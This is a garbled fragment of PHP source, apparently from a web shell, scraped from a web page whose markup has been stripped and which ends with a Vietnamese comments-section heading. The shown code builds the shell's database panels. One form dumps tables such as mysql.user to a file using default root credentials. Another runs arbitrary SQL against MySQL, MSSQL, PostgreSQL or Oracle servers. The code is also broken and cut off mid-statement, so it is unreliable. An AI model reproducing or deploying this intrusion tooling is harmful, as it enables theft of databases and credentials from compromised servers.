".$lang[$language.`_text104`]."".$lang[$language.`_text105`].$arrow."".$lang[$language.`_text106`].$arrow."".$lang[$language.`_text107`].$arrow."".$lang[$language.`_text18`].$arrow."".$lang[$language.`_text91`].$arrow.""; } if($mysql_on||$mssql_on||$pg_on||$ora_on) { $select = ``; if($mssql_on) $select .= ``; if($pg_on) $select .= ``; if($ora_on) $select .= ``; $select .= ``; echo $table_up1.$lang[$language.`_text82`].up_down(`id20`).$table_up2.div(`id20`).$ts."".$fs."".$ts; echo "
".$lang[$language.`_text40`]."
"; echo sr(35,"".$lang[$language.`_text80`].$arrow."",$select); echo sr(35,"".$lang[$language.`_text111`].$arrow."",in(`text`,`db_server`,15,(!empty($_POST[`db_server`])?($_POST[`db_server`]):("localhost"))).` : `.in(`text`,`db_port`,15,(!empty($_POST[`db_port`])?($_POST[`db_port`]):("3306")))); echo sr(35,"".$lang[$language.`_text37`].` : `.$lang[$language.`_text38`].$arrow."",in(`text`,`mysql_l`,15,(!empty($_POST[`mysql_l`])?($_POST[`mysql_l`]):("root"))).` : `.in(`text`,`mysql_p`,15,(!empty($_POST[`mysql_p`])?($_POST[`mysql_p`]):("password")))); echo sr(35,"".$lang[$language.`_text36`].$arrow."",in(`text`,`mysql_db`,15,(!empty($_POST[`mysql_db`])?($_POST[`mysql_db`]):("mysql"))).` . `.in(`text`,`mysql_tbl`,15,(!empty($_POST[`mysql_tbl`])?($_POST[`mysql_tbl`]):("user")))); echo sr(35,in(`hidden`,`dir`,0,$dir).in(`hidden`,`cmd`,0,`mysql_dump`)."".$lang[$language.`_text41`].$arrow."",in(`checkbox`,`dif id=dif`,0,`1`).in(`text`,`dif_name`,31,(!empty($_POST[`dif_name`])?($_POST[`dif_name`]):("dump.sql")))); echo sr(35,"",in(`submit`,`submit`,0,$lang[$language.`_butt9`])); echo $te."".$fe.$fs."".$ts; echo "
".$lang[$language.`_text83`]."
"; echo sr(35,"".$lang[$language.`_text80`].$arrow."",$select); echo sr(35,"".$lang[$language.`_text111`].$arrow."",in(`text`,`db_server`,15,(!empty($_POST[`db_server`])?($_POST[`db_server`]):("localhost"))).` : `.in(`text`,`db_port`,15,(!empty($_POST[`db_port`])?($_POST[`db_port`]):("3306")))); echo sr(35,"".$lang[$language.`_text37`].` : `.$lang[$language.`_text38`].$arrow."",in(`text`,`mysql_l`,15,(!empty($_POST[`mysql_l`])?($_POST[`mysql_l`]):("root"))).` : `.in(`text`,`mysql_p`,15,(!empty($_POST[`mysql_p`])?($_POST[`mysql_p`]):("password")))); echo sr(35,"".$lang[$language.`_text39`].$arrow."",in(`text`,`mysql_db`,15,(!empty($_POST[`mysql_db`])?($_POST[`mysql_db`]):("mysql")))); echo sr(35,"".$lang[$language.`_text84`].$arrow."".in(`hidden`,`dir`,0,$dir).in(`hidden`,`cmd`,0,`db_query`),""); echo $te."
".in(`submit`,`submit`,0,$lang[$language.`_butt1`])."
".$fe."
".$lang[$language.`_text9`]."
".$lang[$language.`_text12`]."
".$lang[$language.`_text22`]."
Các ý kiến mới nhất